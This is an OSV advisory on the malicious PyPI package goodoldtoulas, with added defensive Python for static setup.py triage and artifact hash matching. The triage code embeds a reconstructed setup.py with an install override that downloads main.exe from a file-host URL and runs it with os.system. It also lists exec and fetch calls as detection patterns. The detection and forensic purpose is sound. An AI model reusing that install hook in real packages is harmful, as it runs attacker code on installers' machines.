MAL-2026-5271
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (5414e9956c915ef34d422d9eba09177fb667bba375c43e9d9b54d4f87b628712)
During pip install goodoldtoulas, setup.py invokes setup_helper() which downloads main.exe from https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe (anonymous file host) into C:\MALWARE_DELETE and executes it via os.system('main.exe') (setup.py lines 6, 21, 33). The fetch is unpinned, has no hash verification, the destination is an opaque Windows binary, the host is not the publisher's domain, and the staging path name is self-incriminating. Any installer running pip install of this package on Windows fetches and executes an attacker-controlled binary at install time.
Source: kam193 (24dbb5643933ff305b2eab164e820476f645ef2b59ad7c7cdfdeb2c3c3bfb98f)
During installation, package attempts to download and run an executable imitating malicious activity.
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: 2026-06-goodoldtoulas
Reasons (based on the campaign):
- The package overrides the install command in setup.py to execute malicious code during installation.
- Downloads and executes a remote executable.
- CWE-506 - The product contains code that appears to be malicious in nature.
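The reasons above name a recognisable install-time pattern: a setuptools `cmdclass` override in setup.py, a fetch of a binary from a file host, and a process launch on the result, all before any import of the package. The following is an added example of how to triage a sdist for that combination statically, before running `pip install`; it is not code from the advisory's sources or from the package. `SAMPLE_SETUP_PY` is a constructed stand-in modelled on the advisory's description (the advisory does not reproduce the real setup.py), and the call lists `EXEC_CALLS`, `FETCH_CALLS` and `SETUPTOOLS_HOOKS` are this example's own choices, not a published signature set.

```python
"""Static triage of a sdist's setup.py for install-time download-and-execute.

Added example; not code from the advisory's sources or from the package itself.
SAMPLE_SETUP_PY is a constructed stand-in that mirrors what the advisory describes
(cmdclass install override, fetch from a file-host URL, os.system on the result);
the real goodoldtoulas setup.py is not reproduced here.
"""
import ast
import re

# Constructed sample, modelled on the behaviour the advisory attributes to goodoldtoulas.
SAMPLE_SETUP_PY = r'''
import os
import urllib.request
from setuptools import setup
from setuptools.command.install import install

URL = "https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe"
STAGE = r"C:\MALWARE_DELETE"

def setup_helper():
    os.makedirs(STAGE, exist_ok=True)
    urllib.request.urlretrieve(URL, STAGE + r"\main.exe")
    os.chdir(STAGE)
    os.system("main.exe")

class PostInstall(install):
    def run(self):
        setup_helper()
        install.run(self)

setup(name="goodoldtoulas", version="0.1.0", cmdclass={"install": PostInstall})
'''

# Constructed benign control: plain metadata, no hooks.
BENIGN_SETUP_PY = "from setuptools import setup\nsetup(name='demo', version='1.0')\n"

# This example's own lists: calls that run a process, calls that fetch from the
# network, and the setuptools commands an attacker overrides to run code under pip.
EXEC_CALLS = {"os.system", "os.popen", "os.startfile", "os.execv", "os.execvp",
              "subprocess.run", "subprocess.call", "subprocess.Popen",
              "subprocess.check_call", "subprocess.check_output"}
FETCH_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen",
               "requests.get", "http.client.HTTPSConnection"}
SETUPTOOLS_HOOKS = {"install", "develop", "egg_info", "build_py", "build_ext"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def dotted_name(node):
    """Render a Name/Attribute chain such as urllib.request.urlretrieve as a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(node.id)
    return ".".join(reversed(parts))


def scan_setup_py(source):
    """Return the hook overrides, exec/fetch calls and embedded URLs found in setup.py."""
    findings = {"hooks": [], "exec_calls": [], "fetch_calls": [], "urls": []}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in EXEC_CALLS:
                findings["exec_calls"].append((name, node.lineno))
            elif name in FETCH_CALLS:
                findings["fetch_calls"].append((name, node.lineno))
            elif name == "setup":
                # cmdclass={"install": Cls} is how setup.py gets code run by `pip install`.
                for kw in node.keywords:
                    if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                        for key in kw.value.keys:
                            if isinstance(key, ast.Constant) and key.value in SETUPTOOLS_HOOKS:
                                findings["hooks"].append((key.value, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            findings["urls"].extend(URL_RE.findall(node.value))
    return findings


def is_download_and_execute(findings):
    """Hook override + network fetch + process execution together is the pattern in this advisory."""
    return bool(findings["hooks"] and findings["fetch_calls"] and findings["exec_calls"])


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        f = scan_setup_py(src)
        print(label, "download-and-execute" if is_download_and_execute(f) else "clean", f)
```

Run it over the extracted sdist (`tar xzf goodoldtoulas-0.1.0.tar.gz` in a throwaway directory, never `pip install`), and treat a hit as grounds for a sandboxed run, not as proof: a name-based AST scan is defeated by `getattr(os, "sys" + "tem")`, `exec(base64.b64decode(...))` or an `importlib` detour, so a clean result from this scan says nothing on its own.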
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"domains": [
"cold-eu-par-1.gofile.io",
"gofile.io"
],
"evidence_files": [
{
"path": "setup.py",
"sha256": "a652013c0a212dd192245d54be497675a6fe335938f7851d037f5c05dda045e3",
"tlsh": "f41110c5ce0064519286a9486e93882c1636f753bf26e4d07f8c53953f8a1a387a613d"
}
],
"package_integrity": [
{
"filename": "goodoldtoulas-0.1.0-py3-none-any.whl",
"hashes": {
"blake2b_256": "da9bc125d290eae54e3e58e1efadfadcbb3191a8be8f57fd9cf9153081a2eec4",
"md5": "13ff8ef6e7ddff02a2c2e60327af7cdc",
"sha256": "c3c429546d61f32a700a5774e1b0785a274243d361ee595d1757f285c3c18093"
}
},
{
"filename": "goodoldtoulas-0.1.0.tar.gz",
"hashes": {
"blake2b_256": "505b6505616b91b744fdac2f8ce68e8f18486de0f86c691f3fd86ff8b2701897",
"md5": "0374d56c3ea6114a7f3f1fa46ee57867",
"sha256": "020266644387589422bac12dcff9dcdaea0b022393f617d317e8bf3f91b0902c"
}
}
]
}
},
"package": {
"ecosystem": "PyPI",
"name": "goodoldtoulas"
},
"versions": [
"0.1.0"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
},
{
"contact": [
"https://github.com/kam193",
"https://bad-packages.kam193.eu/"
],
"name": "Kamil Ma\u0144kowski (kam193)",
"type": "REPORTER"
}
],
"database_specific": {
"iocs": {
"urls": [
"https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe"
]
},
"malicious-packages-origins": [
{
"id": "pypi/2026-06-goodoldtoulas/goodoldtoulas",
"import_time": "2026-06-05T18:10:37.118968761Z",
"modified_time": "2026-06-05T17:29:05.826413Z",
"sha256": "24dbb5643933ff305b2eab164e820476f645ef2b59ad7c7cdfdeb2c3c3bfb98f",
"source": "kam193",
"versions": [
"0.1.0"
]
},
{
"id": "IN-MAL-2026-005259",
"import_time": "2026-06-10T07:37:16.484567139Z",
"modified_time": "2026-06-10T07:12:18Z",
"sha256": "463564954b6a05239e3161ff46d10a0ad605c36ec4c7bda57c08db53e4044c3d",
"source": "amazon-inspector",
"versions": [
"0.1.0"
]
},
{
"id": "IN-MAL-2026-005258",
"import_time": "2026-06-10T07:37:16.422434459Z",
"modified_time": "2026-06-10T07:12:17Z",
"sha256": "5414e9956c915ef34d422d9eba09177fb667bba375c43e9d9b54d4f87b628712",
"source": "amazon-inspector",
"versions": [
"0.1.0"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5414e9956c915ef34d422d9eba09177fb667bba375c43e9d9b54d4f87b628712)\nDuring `pip install goodoldtoulas`, setup.py invokes setup_helper() which downloads main.exe from https://cold-eu-par-1.gofile.io/download/web/deb39e07-da2d-4081-a86b-6380e555788c/main.exe (anonymous file host) into C:\\MALWARE_DELETE and executes it via os.system(\u0027main.exe\u0027) (setup.py lines 6, 21, 33). The fetch is unpinned, has no hash verification, the destination is an opaque Windows binary, the host is not the publisher\u0027s domain, and the staging path name is self-incriminating. Any installer running pip install of this package on Windows fetches and executes an attacker-controlled binary at install time.\n\n## Source: kam193 (24dbb5643933ff305b2eab164e820476f645ef2b59ad7c7cdfdeb2c3c3bfb98f)\nDuring installation, package attempts to download and run an executable imitating malicious activity.\n\n\n---\n\nCategory: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research \u0026 co, with clearly low-harm possibilities.\n\n\nCampaign: 2026-06-goodoldtoulas\n\n\nReasons (based on the campaign):\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n\n - Downloads and executes a remote executable.\n",
"id": "MAL-2026-5271",
"modified": "2026-06-10T07:39:02Z",
"published": "2026-06-05T17:29:05Z",
"references": [
{
"type": "WEB",
"url": "https://bad-packages.kam193.eu/pypi/package/goodoldtoulas"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/goodoldtoulas/0.1.0/"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in goodoldtoulas (PyPI)"
}
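The `package_integrity` block in the record above lists md5, sha256 and blake2b_256 for both published artifacts, which is what lets a responder decide whether a wheel or sdist already sitting in a build cache or a `pip download` directory is the flagged one. The following is an added example of that check; it is not tooling from OSV, OpenSSF or the reporters credited above. It walks the record layout shown above (`affected[].database_specific.indicators.package_integrity`), and the embedded `OSV_RECORD` is the record's affected block trimmed to the fields the check needs, with the hash values copied from the record. Note that PyPI's `blake2b_256` is BLAKE2b with a 32-byte digest, not `hashlib.blake2b`'s 64-byte default.

```python
"""Match local pip artifacts against the package_integrity hashes in an OSV record.

Added example; not tooling from OSV, OpenSSF or the reporters credited in the record.
OSV_RECORD is the affected block of MAL-2026-5271 trimmed to the fields this check
uses; the hash values are the ones listed in the record.
"""
import hashlib
import json
import sys

OSV_RECORD = json.loads(r'''
{
  "id": "MAL-2026-5271",
  "affected": [
    {
      "package": {"ecosystem": "PyPI", "name": "goodoldtoulas"},
      "versions": ["0.1.0"],
      "database_specific": {
        "indicators": {
          "package_integrity": [
            {"filename": "goodoldtoulas-0.1.0-py3-none-any.whl",
             "hashes": {"blake2b_256": "da9bc125d290eae54e3e58e1efadfadcbb3191a8be8f57fd9cf9153081a2eec4",
                        "md5": "13ff8ef6e7ddff02a2c2e60327af7cdc",
                        "sha256": "c3c429546d61f32a700a5774e1b0785a274243d361ee595d1757f285c3c18093"}},
            {"filename": "goodoldtoulas-0.1.0.tar.gz",
             "hashes": {"blake2b_256": "505b6505616b91b744fdac2f8ce68e8f18486de0f86c691f3fd86ff8b2701897",
                        "md5": "0374d56c3ea6114a7f3f1fa46ee57867",
                        "sha256": "020266644387589422bac12dcff9dcdaea0b022393f617d317e8bf3f91b0902c"}}
          ]
        }
      }
    }
  ]
}
''')


def _digests():
    # PyPI's blake2b_256 is BLAKE2b truncated to a 32-byte digest.
    return {"md5": hashlib.md5(), "sha256": hashlib.sha256(),
            "blake2b_256": hashlib.blake2b(digest_size=32)}


def hash_bytes(data):
    """Digest in-memory bytes with the three algorithms PyPI publishes."""
    h = _digests()
    for d in h.values():
        d.update(data)
    return {name: d.hexdigest() for name, d in h.items()}


def hash_file(path, chunk=1 << 20):
    """Stream a file through the same three digests in one pass (artifacts can be large)."""
    h = _digests()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            for d in h.values():
                d.update(block)
    return {name: d.hexdigest() for name, d in h.items()}


def integrity_index(record):
    """Map (algorithm, hex digest) to (advisory id, ecosystem, package, filename)."""
    index = {}
    for aff in record.get("affected", []):
        pkg = aff.get("package", {})
        entries = (aff.get("database_specific", {}).get("indicators", {})
                   .get("package_integrity", []))
        for entry in entries:
            for algo, digest in entry["hashes"].items():
                index[(algo, digest.lower())] = (record["id"], pkg.get("ecosystem"),
                                                 pkg.get("name"), entry["filename"])
    return index


def match_artifact(record, digests):
    """Return the matching entry, or None.

    sha256 and blake2b_256 hits are conclusive; an md5-only hit is still reported
    but flagged weak, since md5 collisions are practical and a record may list only md5.
    """
    index = integrity_index(record)
    for algo in ("sha256", "blake2b_256", "md5"):
        hit = index.get((algo, digests[algo].lower()))
        if hit:
            return {"matched_by": algo, "weak": algo == "md5", "entry": hit}
    return None


if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, match_artifact(OSV_RECORD, hash_file(path)))
```

Point it at any `.whl` or `.tar.gz` in `pip cache dir`, a CI artifact store or a `pip download` directory; `pip hash --algorithm sha256 FILE` gives the same sha256 for a cross-check. Matching after the fact is the forensic half; the preventive half is `pip install --require-hashes -r requirements.txt` with pinned hashes, under which pip refuses any package, this one included, whose hash is not on the list, so setup.py never runs.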
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.